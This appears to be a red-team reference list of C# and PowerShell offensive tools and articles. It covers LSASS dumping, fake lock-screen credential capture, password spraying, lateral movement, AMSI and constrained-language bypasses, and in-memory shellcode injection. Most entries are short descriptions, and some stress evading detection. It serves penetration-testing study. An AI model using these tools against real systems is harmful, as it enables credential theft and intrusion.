Tools
-
Task Scheduler
- Provides a .NET wrapper for the Windows Task Scheduler. It aggregates the multiple versions, provides an editor and allows for localization.
-
Task Scheduler
-
Services
-
Unstoppable Service
- A pattern for a self-installing Windows service in C# with the unstoppable attributes in C#.
-
Unstoppable Service
-
Credential Attacks
-
Process Memory
- Writing Minidumps in C# - docs.ms
- Dumping Process Memory with Custom C# Code - 3xplo1tcod3r
-
SharpDump
- SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.
-
ATPMiniDump
- Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft.
- Blogpost
-
SafetyKatz
- SafetyKatz is a combination of slightly modified version of @gentilkiwi's Mimikatz project and @subtee's .NET PE Loader.
-
KittyLitter
- This project was made for an upcoming event. It is comprised of two components, KittyLitter.exe and KittyScooper.exe. This will bind across TCP, SMB, and MailSlot channels to communicate credential material to lowest privilege attackers.
-
Clipboard
-
SharpClipboard
- C# Clipboard Monitor
- Blogpost
-
SharpClipHistory
- SharpClipHistory is a .NET application written in C# that can be used to read the contents of a user's clipboard history in Windows 10 starting from the 1809 Build.
-
SharpClipboard
-
Credentials on Disk/Stored in files
-
SharpCloud
- SharpCloud is a simple C# utility for checking for the existence of credential files related to Amazon Web Services, Microsoft Azure, and Google Compute.
-
SharpCloud
-
DPAPI
-
SharpDPAPI
- SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.
-
SharpDPAPI
-
Fake UI Prompt
-
Tools
-
SharpLocker
- SharpLocker helps get current user credentials by popping a fake Windows lock screen, all output is sent to Console which works perfect for Cobalt Strike. It is written in C# to allow for direct execution via memory injection using techniques such as execute-assembly found in Cobalt Strike or others, this method prevents the executable from ever touching disk. It is NOT intended to be compilled and run locally on a device.
-
SharpLocker
-
Tools
-
Kerberos
-
Rubeus
- Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy's Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUX's MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.https://www.slideshare.net/aj0612/a-study-on-net-framework-for-red-team-part-i
-
Rubeus
-
LLMNR/NBNS Spoofing
-
InveighZero
- Windows C# LLMNR/mDNS/NBNS/DNS spoofer/man-in-the-middle tool
-
InveighZero
-
Multi-Tools
-
SafetyKatz
- SafetyKatz is a combination of slightly modified version of @gentilkiwi's Mimikatz project and @subtee's .NET PE Loader.
-
SafetyKatz
-
Password Spray
-
SharpSpray
- SharpSpray a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike.
-
SharpSpray
-
Proxy
-
FreshCookies
- C# .NET 3.5 tool that keeps proxy auth cookies fresh by maintaining a hidden IE process that navs to your hosted auto refresh page. Uses WMI event listeners to monitor for InstanceDeletionEvents of the Internet Explorer process, and starts a hidden IE process via COM object if no other IE processes are running.
-
FreshCookies
-
Password Spraying
-
SharpDomainSpray
- SharpDomainSpray is a very simple password spraying tool written in .NET. It takes a password then finds users in the domain and attempts to authenticate to the domain with that given password.
-
SharpDomainSpray
-
RDP
-
RdpThief
- RdpThief by itself is a standalone DLL that when injected in the mstsc.exe process, will perform API hooking, extract the clear-text credentials and save them to a file.
- Blogpost
-
SharpRDPCheck
- Use to check the valid account of the Remote Desktop Protocol(Support plaintext and ntlmhash)
-
RdpThief
-
Vault Credentials
-
SharpEdge
- C# Implementation of Get-VaultCredential - Get-VaultCredential enumerates and displays all credentials stored in the Windows vault. Web credentials, specifically are displayed in cleartext. This script was inspired by the following C implementation: http://www.oxid.it/downloads/vaultdump.txt
-
SharpEdge
-
ActiveDirectory-related
-
ADFSpoof
- A python tool to forge AD FS security tokens. - Meant to be used with ADFSDump
-
ADFSDump
- ADFSDump is a tool that will read information from Active Directory and from the AD FS Configuration Database that is needed to generate forged security tokens. This information can then be fed into ADFSpoof to generate those tokens. - Meant to be used with ADFSpoof
-
SharpAdidnsdump
- c# implementation of Active Directory Integrated DNS dumping (authenticated user)
-
SprayAD
- This tool can help Red and Blue teams to audit Active Directory useraccounts for weak, well known or easy guessable passwords and can help Blue teams to assess whether these events are properly logged and acted upon. When this tool is executed, it generates event IDs 4771 (Kerberos pre-authentication failed) instead of 4625 (logon failure). This event is not audited by default on domain controllers and therefore this tool might help evading detection while password spraying.
-
ADFSpoof
-
Process Memory
-
Lateral Movement
- Multiple
- .NET Remoting
-
DCOM
-
SharpCOM
- SharpCOM is a c# port of Invoke-DCOM
-
SharpExcel4-DCOM
- Port of Invoke-Excel4DCOM
-
SharpCOM
-
MSSQL
-
Lateral movement via MSSQL: a tale of CLR and socket reuse - Juan Manuel Fernandez, Pablo Martínez
- Recently, our Red Team had to deal with a restricted scenario, where all traffic from the DMZ to the main network was blocked, except for connections to specific services like databases and some web applications. In this article, we will explain how we overcame the situation, covering the technical details. We also introduce mssqlproxy, a tool for turning a Microsoft SQL Server into a socks proxy.
-
Lateral movement via MSSQL: a tale of CLR and socket reuse - Juan Manuel Fernandez, Pablo Martínez
-
RDP
- Articles/Blogposts/Writeups
-
Tools
-
SharpRPD
- Remote Desktop Protocol .NET Console Application for Authenticated Command Execution
-
SharpDoor
- SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file, for opsec considerations SharpDoor still using cmd.exe to run sc services to impersonating as trustedinstaller in the future will be avoiding cmd.exe usage, currently only support for Windows 10.
-
SharpRDP
- Blogpost
- Remote Desktop Protocol .NET Console Application for Authenticated Command Execution
-
SharpRPD
-
Registry
-
SCShell
- Fileless lateral movement tool that relies on ChangeServiceConfigA to run command
-
SCShell
-
SMB
-
CSExec
- This is an example for how to implement psexec (from SysInternals Suite) functionality, but in open source C#. This does not implement all of the psexec functionality, but it does implement the equivalent functionality to running: psexec -s \target-host cmd.exe
-
SharpInvoke-SMBExec
- A native C# conversion of Kevin Robertsons Invoke-SMBExec powershell script.
-
CSExec
-
WinRM
-
CSharp-WinRM
- .NET 4.0 WinRM API Command Execution
-
CSharp-WinRM
-
WMI
-
SharpWMI
- SharpWMI is a C# implementation of various WMI functionality. This includes local/remote WMI queries, remote WMI process creation through win32_process, and remote execution of arbitrary VBS through WMI event subscriptions. Alternate credentials are also supported for remote methods.
-
SharpInvoke-WMIExec
- A native C# conversion of Kevin Robertsons Invoke-SMBExec powershell script
-
SharpWMI
-
Evasion
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
-
Tools
-
tvasion
- Anti virus evasion based on file signature change via AES encryption with Powershell and C# AV evasion templates which support executable and Powershell payloads with Windows executable, Powershell or batch output. Developed with Powershell on Linux for Windows targets :)
-
AVIator
- Antivirus evasion project
-
PEunion
- PEunion bundles multiple executables (or any other file type) into a single file. Each file can be configured individually to be compressed, encrypted, etc. In addition, an URL can be provided for a download to be executed. The resulting binary is compiled from dynamically generated C# code. No resources are exposed that can be harvested using tools like Resource Hacker. PEunion does not use managed resources either. Files are stored in byte[] code definitions and when encryption and compression is applied, files become as obscure as they can get.
-
Self-Morphing C# Binary
- C# binary that mutates its own code, encrypts and obfuscates itself on runtime
-
Inception-Framework
- Inception provides In-memory compilation and reflective loading of C# apps for AV evasion. Payloads are AES encrypted before transmission and are decrypted in memory. The payload server ensures that payloads can only be fetched a pre-determined number of times. Once decrypted, Roslyn is used to build the C# payload in memory, which is then executed using reflection.
-
SharpLoadImage
- Hide .Net assembly into png images
-
BlockETW
- .Net Assembly to block ETW telemetry in current process
-
SharpPack
- Blogpost
- SharpPack is a toolkit for insider threat assessments that lets you defeat application whitelisting to execute arbitrary DotNet and PowerShell tools.
-
tvasion
-
Script Repos/Good Stuff
- GhostPack
-
SharpSploit
- SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.
-
Sharp-Suite
- FuzzySecurity: 'My musings with C#'
-
OffensiveCSharp-matterpreter
- This is a collection of C# tooling and POCs I've created for use on operations. Each project is designed to use no external libraries. Open each project's .SLN in Visual Studio and compile as "Release".
-
bytecode-api
- C# library with common classes, extensions and additional features in addition to the .NET Framework. BytecodeApi implements lots of extensions and classes for general purpose use. In addition, specific classes implement more complex logic for both general app development as well as for WPF apps. Especially, boilerplate code that is known to be part of any Core DLL in a C# project is likely to be already here. In fact, I use this library in many of my own projects. For this reason, each class and method has been reviewed numerous times. BytecodeApi is highly consistent, particularly in terms of structure, naming conventions, patterns, etc. The entire code style resembles the patterns used in the .NET Framework itself. You will find it intuitive to understand.
-
OutlookToolbox
- OutlookToolbox is a C# DLL that uses COM to do stuff with Outlook. Also included is a Cobalt Strike aggressor script that uses Outlooktoolbox.dll to give it a graphical and control interface.
- Blogpost
-
OffensiveDLR
- Toolbox containing research notes & PoC code for weaponizing .NET's DLR
- RedTeamCSharpScripts - Mr-Un1k0d3r
- CSharpScripts - Arno0x
-
Named Pipes
- This is a proof of concept / pattern concept for creating a client/server communication model with named pipes in C#. In this example, a client passes a message to the server over a named pipe which is then executed as a command on the server. The standard out and standard error are redirected back to the client over the named pipe and printed to the terminal screen.
-
Utiltiies
-
Compression
-
MiddleOut
- This tool was created to compress files through the command line and will work with Cobalt Strike's execute-assembly.
-
MiddleOut
-
Files
-
FileWriter
- .NET project for writing files to local or remote hosts
-
LockLess
- LockLess is a C# tool that allows for the enumeration of open file handles and the copying of locked files.
-
FileWriter
-
Scheduled Tasks
- Creating Scheduled Tasks(C#) - StackOverflow
- Creating a Task Using NewWorkItem Example - docs.ms
-
SharpTask
- SharpTask is a simple code set to interact with the Task Scheduler service API using the same DCERPC process as schtasks.exe, which open with TCP port 135 and is followed by the use of an ephemeral TCP port. This code is compatible with Cobalt Strike.
-
Compression
Powershell Things
-
101
- Why I Choose PowerShell as an Attack Platform - @mattifestation(2012)
- The PowerSploit Manifesto - @mattifestation(2015)
- PowerShell is Not Special - An Offensive PowerShell Retrospective - @mattifestation(2017)
-
APTs ❤️PowerShell You Should Too - Anthony Rose, Jake Krasnov(Defcon Safe Mode RTV)
- Quite often, you may have heard people mention, “Why should you bother learning PowerShell, isn’t it dead?” or “Why not just use C#?” Many individuals in the offensive security field have a common misconception that PowerShell is obsolete for red team operations. Meanwhile, it remains one of the primary attack vectors employed by Advanced Persistent Threats (APTs). APTs are known for implementing sophisticated hacking tactics, techniques, and procedures (TTPs) to gain access to a system for an extended period of time. Their actions typically focus on high-value targets, which leave potentially crippling consequences to both nation-states and corporations. It is crucial that Red Teams accurately emulate real-world threats and do not ignore viable attack options. For this talk, we will walk through how many threat actors adapt and employ PowerShell tools. Our discussion begins with examining how script block logging and AMSI are powerful anti-offensive PowerShell measures. However, the implementation of script block logging places a technical burden on organizations to conduct auditing on a substantial amount of data. While AMSI is trivial to bypass for any capable adversary. Finally, we will demonstrate APT-like PowerShell techniques that remain incredibly effective against the latest generation of network defenses.
-
Learning
-
Articles/Blogposts/Writeups
- PowerShell 101 - Carlos Perez
- Get-Help: An Intro to PowerShell and How to Use it for Evil - Jared Haight
-
Brosec
- Brosec is a terminal based reference utility designed to help us infosec bros and broettes with usefuPowershelll (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec's most popular use cases is the ability to generate on the fly reverse shells (python, perl, powershell, etc) that get copied to the clipboard.
-
Talks/Presentations/Videos
-
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility - Satoshi Tanda(CodeBlueTokyo2017)
- Slides
- Code
- This talk will discuss how to gain greater visibility into managed program execution, especially for PowerShell, using a .NET native code hooking technique to help organizations protect themselves from such advanced attacker techniques. In this session, we will demonstrate how to enhance capabilities provided by AMSI and how to overcome its limitations, through a realistic implementation of the technique, all while analyzing the internals of .NET Framework and the PowerShell engine.
-
Defensive Coding Strategies for a High-Security Environment - Matt Graeber - PowerShell Conference EU 2017
- How sure are you that your PowerShell code is prepared to handle anything that a user might throw at it? What if the user was an attacker attempting to circumvent security controls by exploiting a vulnerability in your script? This may sound unrealistic but this is a legitimate concern of the PowerShell team when including PowerShell code in the operating system. In a high-security environment where strict AppLocker or Device Guard rules are deployed, PowerShell exposes a large attack surface that can be used to circumvent security controls. While constrained language mode goes a long way in preventing malicious PowerShell code from executing, attackers will seek out vulnerabilities in trusted signed code in order to circumvent security controls. This talk will cover numerous different ways in which attackers can influence the execution of your code in unanticipated ways. A thorough discussion of mitigations against such attacks will then follow.
-
APTs LOVE PowerShell and Why You Should Too - Anthony Rose & Jake Krasnov(Defcon28RedTeamVillage)
- "Quite often, you may have heard people mention, “Why should you bother learning PowerShell, isn’t it dead?” or “Why not just use C#?” Many individuals in the offensive security field have a common misconception that PowerShell is obsolete for red team operations. Meanwhile, it remains one of the primary attack vectors employed by Advanced Persistent Threats (APTs). APTs are known for implementing sophisticated hacking tactics, techniques, and procedures (TTPs) to gain access to a system for an extended period of time. Their actions typically focus on high-value targets, which leave potentially crippling consequences to both nation-states and corporations. It is crucial that Red Teams accurately emulate real-world threats and do not ignore viable attack options. For this talk, we will walk through how many threat actors adapt and employ PowerShell tools. Our discussion begins with examining how script block logging and AMSI are powerful anti-offensive PowerShell measures. However, the implementation of script block logging places a technical burden on organizations to conduct auditing on a substantial amount of data. While AMSI is trivial to bypass for any capable adversary. Finally, we will demonstrate APT-like PowerShell techniques that remain incredibly effective against the latest generation of network defenses.
-
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility - Satoshi Tanda(CodeBlueTokyo2017)
-
Articles/Blogposts/Writeups
- File Parsing
- Logging
-
Discovery
-
AD
-
Powersploit-PowerView
- PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows "net *" commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality.
-
PowerShell-AD-Recon
- AD PowerShell Recon Scripts
-
PowEnum
- PowEnum executes common PowerSploit Powerview functions and combines the output into a spreadsheet for easy analysis. All network traffic is only sent to the DC(s). PowEnum also leverages PowerSploit Get-GPPPassword and Harmj0y's ASREPRoast.
-
Powersploit-PowerView
-
Files
-
SessionGopher
- SessionGopher is a PowerShell tool that uses WMI to extract saved session information for remote access tools such as WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop. It can be run remotely or locally.
-
CC_Checker
- CC_Checker cracks credit card hashes with PowerShell.
-
SessionGopher
-
LocalHost
- PowerView
- HostRecon
-
Memory & Processes
- Powershell Live-Memory Analysis Tools: Dump-Memory, Dump-Strings, Check-MemoryProtection - @mattifestation(2012)
-
Invoke-ProcessScan
- Gives context to a system. Uses EQGRP shadow broker leaked list to give some descriptions to processes.
-
SQLite
-
PSSQLite PowerShell Module
- PowerShell module to query SQLite databases
-
PSSQLite PowerShell Module
-
WebBrowser
-
BrowserGatherer
- Fileless Extraction of Sensitive Browser Information with PowerShell
-
BrowserGather
- Fileless Extraction of Sensitive Browser Information with PowerShell. This project will include various cmdlets for extracting credential, history, and cookie/session data from the top 3 most popular web browsers (Chrome, Firefox, and IE). The goal is to perform this extraction entirely in-memory, without touching the disk of the victim. Currently Chrome credential and cookie extraction is supported.
-
BrowserGatherer
-
AD
-
Execution
-
Articles/Blogposts/Writeups
- Meterpreter New Windows PowerShell Extension - Carlos Perez(2016)
-
Introducing PowerShell into your Arsenal with PS>Attack - Jared Haight(Derbycon206)
- PS>Attack is a custom tool that was created to make it easier for Penetration Testers to incorporate PowerShell into their bag of tricks. It combines a lot of the best offensive tools from the offensive PowerShell community into a custom, encrypted console that emulates a PowerShell environment. It also includes a custom command, "Get-Attack" to act a search engine for attacks making it easy to find the right attack for any situation. In this presentation we will cover how PowerShell can be used during every part of a penetration test and how PS>Attack can help make the whole process a lot easier.
-
Tools
-
Invoke-ReflectivePEInjection.ps1
- This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process, or it can reflectively load a DLL in to a remote process.
- Managing Privileges using PoshPrivilege - Boe Prox(2015)
-
Invoke-ReflectivePEInjection.ps1
-
Add-Type & Reflection
-
101
-
Add-Type - docs.ms
- Adds a Microsoft .NET Core class to a PowerShell session.
- Add-Type - SS64
- Add-Type vs. [reflection.assembly] in PowerShell - Tim Curwick(2013)
- Using Add-Type in a PowerShell script that is run as a Scheduled Task - Craig Tolley(2016)
-
Add-Type - docs.ms
-
101
-
Constrained-Language Mode
-
101
-
About Language Modes - docs.ms
- Explains language modes and their effect on PowerShell sessions.
- PowerShell Constrained Language Mode - PowerShell Team(2017)
- A Comparison of Shell and Scripting Language Security - PowerShell Team
-
About Language Modes - docs.ms
-
Articles/Blogposts/Writeups
- AppLocker CLM Bypass via COM - MDSec
- Detecting and Preventing PowerShell Downgrade Attacks - Lee Holmes(2017)
- Simple Bypass for PowerShell Constrained Language Mode - DaveHardy20(2017)
- Powershell Constrained Language Mode ByPass - @spottheplanet
- Exploiting PowerShell Code Injection Vulnerabilities to Bypass Constrained Language Mode - @mattifestation(2017)
- A Look at CVE-2017-8715: Bypassing CVE-2017-0218 using PowerShell Module Manifests - enigma0x3(2017)
- Pentesting and .hta (bypass PowerShell Constrained Language Mode) - Josh Graham(2018)
- Bypassing Applocker and Powershell constrained language mode - DarthSidious
- Powershell CLM Bypass Using Runspaces - Shaksham Jaiswal(2019)
- Talks/Presentations/Videos
-
Tools
-
DotNetToJScript Constrained/Restricted LanguageMode Breakout
- This repository is based on a post by @xpn, more details available here. Xpn's post outlines a bug of sorts where ConstrainedLanguage, when enforced through AppLocker does not prevent COM invocation. Because of this it is possible to define a custom COM object in the registry and force PowerShell to load a Dll. On load it is possible to change the LanguageMode to FullLanguage and break out of the restricted shell. This repo is a variation on this technique where a DotNetToJScript scriptlet is used to directly stage a .Net assembly into the PowerShell process.
-
PoSH_Bypass
- PoSHBypass is a payload and console proof of concept that allows an attatcker or for that matter a legitimate user to bypass PowerShell's 'Constrianed Language Mode, AMSI and ScriptBlock and Module logging'. The bulk of this concept is the combination of 3 separate pieces of research, I've stuck these 3 elements together as my first attempt at non 'Hello World!' C# project.
-
PSByPassCLM
- Bypass for PowerShell Constrained Language Mode
-
powershellveryless
- Constrained Language Mode + AMSI bypass all in one(Currently Blocked without modification)
-
DotNetToJScript Constrained/Restricted LanguageMode Breakout
-
101
-
C# in PS
- Articles/Blogposts/Writeups * Weekend Scripter: Run C# Code from Within PowerShell - Dr Scripto(2013) * Using CSharp (C#) code in Powershell scripts - Stefan Gobner(2010) * PowerShell – .NET Scripting how to ? - audministrator * Executing C# code using PowerShell script - Adam Furmanek(2016) * Use .Net Code (C#) and DLLs in Powershell - Hannes Hayashi(2016) * Powershell: How do you add inline C#? - Dot Jim(2018) * Add-Type - docs.ms * Adds a Microsoft .NET Core class to a PowerShell session. * Add-Type - SS64 * Add-Type vs. [reflection.assembly] in PowerShell - Tim Curwick(2013) * Using Add-Type in a PowerShell script that is run as a Scheduled Task - Craig Tolley(2016)
-
Access Managed Code from Unmanaged Code
-
Native interoperability - docs.ms
- "The following articles show the various ways of doing "native interoperability" in .NET."
- Platform Invoke (P/Invoke) - docs.ms
- Platform Invocation Services - Wikipedia
-
How to: Call Native DLLs from Managed Code Using PInvoke - docs.ms
- Functions that are implemented in unmanaged DLLs can be called from managed code using Platform Invoke (P/Invoke) functionality. If the source code for the DLL is not available, P/Invoke is the only option for interoperating. However, unlike other .NET languages, Visual C++ provides an alternative to P/Invoke. For more information, see Using C++ Interop (Implicit PInvoke).
-
pinvoke
- A library containing all P/Invoke code so you don't have to import it every time. Maintained and updated to support the latest Windows OS.
-
Native interoperability - docs.ms
-
Download Cradles
- Dropping Executables with Powershell - @mattifestation(2011)
-
PowerShell: In-Memory Injection Using CertUtil.exe - mov a, xbx(2018)
- In this blog post I will discuss the steps to use PowerShell, Invoke-CradleCrafter and Microsoft’s Certutil.exe to craft a payload and one-liner that can be used to evade the latest version of Windows Defender (as of this writing), as well as tips for not getting caught by Intrusion Detection Systems and behavior analysis.
-
Invoke-Cradlecrafter - Daniel Bohannon
- PowerShell Remote Download Cradle Generator & Obfuscator
-
Execution Policy
* 15 Ways to Bypass the PowerShell Execution Policy - NetSPI
-
Tools
-
Bat Armor
- Bypass PowerShell execution policy by encoding ps script into bat file.
-
Bat Armor
-
Tools
-
In-Memory
-
Articles/Blogposts/Writeups
- PowerSyringe - PowerShell-based Code/DLL Injection Utility - @mattifestation(2011)
- In-Memory Managed Dll Loading With PowerShell - @mattifestation(2012)
- [Surgical .NET Dissection - Using PowerShell Proxy Functions to Extend Get-Member - @mattifestation]
- Deep Reflection - Defining Structs and Enums in PowerShell - @mattifestation(2012)
- Accessing the Windows API in PowerShell via internal .NET methods and reflection - @mattifestation(2012)
- In-Memory Managed Dll Loading With PowerShell - @mattifestation(2012)
-
Working with Unmanaged Callback Functions in PowerShell - @mattifestation(2013)
- With a little bit of work, you can bind a scriptblock to an unmanaged callback function in PowerShell. The key to accomplishing this is by casting a scriptblock as a non-generic delegate that has the function signature of the desired callback function. Fortunately, creating non-generic delegates is made easy with my Get-DelegateType function.
-
Simple CIL Opcode Execution in PowerShell using the DynamicMethod Class and Delegates - @mattifestation(2013)
- It is possible to assemble .NET methods with CIL opcodes (i.e. .NET bytecode) in PowerShell in only a few lines of code using dynamic methods and delegates.
- PowerShell – Run a .Net Assembly DLL from in Memory - audministrator(2014)
- PowerShell – Run Assembly that is not registered in the GAC - audministrator(2014)
-
PowerShell load .Net Assembly - PsCustomObject(2019)
- One common technique is loading .Net assemblies in PowerShell script or module to leverage functionalities otherwise not available natively in PowerShell. There are multiple methods we can use to add assemblies to PowerShell which we’re going to explore in the post.
-
Articles/Blogposts/Writeups
-
Nishang
-
Nishang
- Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
- Hacking In Windows Using Nishang With Windows PowerShell, Like A Boss! - serenity-networks.com
-
Nishang
-
Powershell without Powershell
-
Articles/Blogposts/Writeups
- Empire without PowerShell.exe
- Powershell without Powershell to bypass app whitelist
- We don’t need powershell.exe - decoder.cloud
- PowerShell: In-Memory Injection Using CertUtil.exe
- Run PowerShell without Powershell.exe — Best tools & techniques - Bank Security
- PowerOPS: PowerShell for Offensive Operations
- The Evolution of Offensive PowerShell Invocation - Lee Christensen
- Talks & Presentations
-
Tools
-
AwesomerShell
- Talk
- This is the awesomershell application code that was presented with the Gray Hat PowerShell talk.
-
OffensivePowerShellTasking
- Run multiple PowerShell scripts concurrently in different app domains. Solves the offensive security problem of running multiple PowerShell scripts concurrently without spawning powershell.exe and without the scripts causing problems with each other (usually due to PInvoke'd functions).
-
PowerLessShell
- PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.
-
NoPowerShell
- NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No
System.Management.Automation.dll
is used; only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe:rundll32 NoPowerShell.dll,main
.
- NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No
-
p0wnedShell
- p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET).
- UnmanagedPowerShell
-
nps - Not PowerShell
- Execute powershell without powershell.exe
-
PSShell
- PSShell is an application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It doesn't need to be "installed" so it's very portable.
-
PowerShdll
- Run PowerShell with rundll32. Bypass software restrictions.
-
PowerOPS
- PowerOPS is an application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a powershell runspace environment (.NET). It intends to include multiple offensive PowerShell modules to make the process of Post Exploitation easier.
-
PowerLine
- Presentation
- Running into environments where the use of PowerShell is being monitored or is just flat-out disabled? Have you tried out the fantastic PowerOps framework but are wishing you could use something similar via Meterpreter, Empire, or other C2 channels? Look no further! In this talk, Brian Fehrman talks about his new PowerLine framework. He overviews the tool, walks you through how to use it, shows you how you can add additional PowerShell scripts with little effort, and demonstrates just how powerful (all pun intended) this little program can be!
-
AwesomerShell
-
Articles/Blogposts/Writeups
- Through LoLBins
- Reflection
-
Reflective DLL Injection
- Reflective DLL Injection with PowerShell - clymb3r(2013)
-
Invoke-DllInjection.ps1 - PowerSploit
- Injects a Dll into the process ID of your choosing.
- PowerPwning: Post-Exploiting By Overpowering PowerShell - Joe Bialek(Defcon21)
-
Reflective PE Injection
-
Invoke-ReflectivePEInjection.ps1 - PowerSploit
- This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process, or it can reflectively load a DLL in to a remote process.
- Reflective PE Injection In Windows 10 1909 - HUBBL3(2020)
-
Invoke-ReflectivePEInjection.ps1 - PowerSploit
- Registry
-
Running Shellcode
-
Invoke-Shellcode.ps1 - PowerSploit
- Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.
-
Invoke-Shellcode.ps1 - PowerSploit
- Runspaces
-
Token Manipulation
-
101
-
Use PowerShell to Duplicate Process Tokens via P/Invoke - Dr Scripto(2012)
- "Summary: Guest blogger, Niklas Goude, shows how to use P/Invoke to duplicate process tokens from LSASS to elevate privileges."
-
Use PowerShell to Duplicate Process Tokens via P/Invoke - Dr Scripto(2012)
- Articles/Blogposts/Writeups
- Tools
-
101
-
WinAPI Access
-
Articles/Blogposts/Writeups
-
Accessing the Windows API in PowerShell via internal .NET methods and reflection - @mattifestation(2012)
- It is possible to invoke Windows API function calls via internal .NET native method wrappers in PowerShell without requiring P/Invoke or C# compilation. How is this useful for an attacker? You can call any Windows API function (exported or non-exported) entirely in memory. For those familiar with Metasploit internals, think of this as an analogue to railgun.
- List All Win32/Native Functions Declared/Used By PowerShell - @mattifestation(2012)
- Low-Level Windows API Access From PowerShell - b33f(2013/14?)
- Get-PEB – A Tool to Dump the Process Environment Block (PEB) of Any Process - @mattifestation(2013)
- PowerShell and Win32 API Access - harmj0y(2014)
- Use PowerShell to Interact with the Windows API: Part 1 - devblogs.msdn(2014)
-
Accessing the Windows API in PowerShell via internal .NET methods and reflection - Matt Graeber(2012)
- It is possible to invoke Windows API function calls via internal .NET native method wrappers in PowerShell without requiring P/Invoke or C# compilation. How is this useful for an attacker? You can call any Windows API function (exported or non-exported) entirely in memory. For those familiar with Metasploit internals, think of this as an analogue to railgun.
- Deep Reflection - Defining Structs and Enums in PowerShell - Matt Graeber(2012)
- Easily Defining Enums, Structs, and Win32 Functions in Memory - Matt Graeber(2014)
- Low-Level Windows API Access From PowerShell - b33f(2016)
- Properly Retrieving Win32 API Error Codes in PowerShell - @mattifestation(2016)
- Writing about Windows API functions in Powershell - Dmitriy Kim(2020)
-
Accessing the Windows API in PowerShell via internal .NET methods and reflection - @mattifestation(2012)
-
Tools
-
PSReflect
- Easily define in-memory enums, structs, and Win32 functions in PowerShell
-
PSReflect
-
Articles/Blogposts/Writeups
-
Articles/Blogposts/Writeups
- Persistence * Practical Persistence with PowerShell - Matt Graeber(2013) * Nothing Lasts Forever: Persistence with Empire - harmj0y(2016)
-
Credential Attacks
- Articles/Blogposts/Writeups
-
Process Dump
-
Dump-Clear-Text-Password-after-KB2871997-installed
- Auto start Wdigest Auth,Lock Screen,Detect User Logon and get clear password.
-
Out-Minidump.ps1
- Generates a full-memory minidump of a process.
-
MimiDbg
- PowerShell oneliner to retrieve wdigest passwords from the memory
-
PowerMemory
- Exploit the credentials present in files and memory. PowerMemory levers Microsoft signed binaries to hack Microsoft operating systems.
-
mimikittenz
- mimikittenz is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes.
-
Dump-Clear-Text-Password-after-KB2871997-installed
-
GPO
-
PShell Script: Extract All GPO Set Passwords From Domain
- This script parses the domain’s Policies folder looking for Group.xml files. These files contain either a username change, password setting, or both. This gives you the raw data for local accounts and/or passwords enforced using Group Policy Preferences. Microsoft chose to use a static AES key for encrypting this password. How awesome is that!
-
PShell Script: Extract All GPO Set Passwords From Domain
-
Mimikatz
-
mimikittenz
- A post-exploitation powershell tool for extracting juicy info from memory.
-
mimikittenz
-
Broadcast Name Resolution Poisoning (BNRP)
-
Inveigh
- Inveigh is a PowerShell LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system.
-
Inveigh
-
Privilege Escalation
- Local Phishing
-
Tools
-
PowerUp
- PowerUp is a powershell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, and escalation opportunities.
-
Sherlock
- PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
- Get-System-Techniques
-
PowerUp
-
Lateral Movement
- DCOM
-
PS-Remoting
-
Secrets of PowerShell Remoting - Don Jones, Tobias Weltner(2018)
- Introduced in Windows PowerShell 2.0, Remoting is one of PowerShell's most useful, and most important, core technologies. It enables you to run almost any command that exists on a remote computer, opening up a universe of possibilities for bulk and remote administration. Remoting underpins other technologies, including Workflow, Desired State Configuration, certain types of background jobs, and much more. This guide isn't intended to be a complete document of what Remoting is and does, although it does provide a good introduction. Instead, this guide is designed to document all the little configuration details that don't appear to be documented elsewhere.
-
Secrets of PowerShell Remoting - Don Jones, Tobias Weltner(2018)
-
ScheduleTask
-
Invoke-CommandAs
- Invoke Command as System/User on Local/Remote computer using ScheduleTask.
-
Invoke-CommandAs
-
Evasion
- Articles/Blogposts/Writeups
-
Talks/Presentations/Videos
-
PowerShell Secrets and Tactics - Ben0xA(Derbycon2016)
